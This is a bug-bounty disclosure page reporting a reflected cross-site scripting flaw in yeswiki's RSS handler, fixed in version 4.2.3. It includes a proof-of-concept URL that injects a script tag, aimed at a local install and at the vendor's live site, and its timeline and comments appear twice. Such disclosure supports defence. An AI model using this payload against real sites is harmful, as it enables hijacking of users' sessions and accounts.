Unauthenticated Cross Site Scripting - Reflected in yeswiki/yeswiki

Valid

Reported on

Jul 27th 2022

Description

Please enter a description of the vulnerability.

Proof of Concept

XSS POC:
Local Host : http://192.168.0.109:81/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(1122)%3C/script%3E

Vendor Domain: 
https://yeswiki.net/?AccueiL/rss&id=1%27%3Cscript%3Ealert(1122)%3C/script%3E

Attached POC Images:

Vendor Domain:

Local Host:

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:

Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

Occurrences

RssHandler.php L19

Don't Know :)

We are processing your report and will contact the yeswiki team within 24 hours. a year ago

We have contacted a member of the yeswiki team and are waiting to hear back a year ago

We have sent a follow up to the yeswiki team. We will try again in 7 days. a year ago

Jérémy Dufraisse validated this vulnerability a year ago

AggressiveUser has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

commented a year ago

Researcher

Hi @maintainer, Please allow @admin to assign CVE ID on this report after fix.

We have sent a fix follow up to the yeswiki team. We will try again in 7 days. a year ago

Jérémy Dufraisse marked this as fixed in 4.2.3 with commit fd59bc a year ago

Jérémy Dufraisse has been awarded the fix bounty

This vulnerability will not receive a CVE

RssHandler.php#L19 has been validated

commented a year ago

Researcher

Dear @maintainer / @admin , can i have CVE for this report ?

commented a year ago

Admin

Happy to assign a CVE once we get the go-ahead from the maintainer 👍

commented a year ago

Researcher

@maintainer Please help us out with this :)

to join this conversation

We are processing your report and will contact the yeswiki team within 24 hours. a year ago

We have contacted a member of the yeswiki team and are waiting to hear back a year ago

We have sent a follow up to the yeswiki team. We will try again in 7 days. a year ago

Jérémy Dufraisse validated this vulnerability a year ago

AggressiveUser has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

commented a year ago

Researcher

Hi @maintainer, Please allow @admin to assign CVE ID on this report after fix.

We have sent a fix follow up to the yeswiki team. We will try again in 7 days. a year ago

Jérémy Dufraisse marked this as fixed in 4.2.3 with commit fd59bc a year ago

Jérémy Dufraisse has been awarded the fix bounty

This vulnerability will not receive a CVE

RssHandler.php#L19 has been validated

commented a year ago

Researcher

Dear @maintainer / @admin , can i have CVE for this report ?

commented a year ago

Admin

Happy to assign a CVE once we get the go-ahead from the maintainer 👍

commented a year ago

Researcher

@maintainer Please help us out with this :)

to join this conversation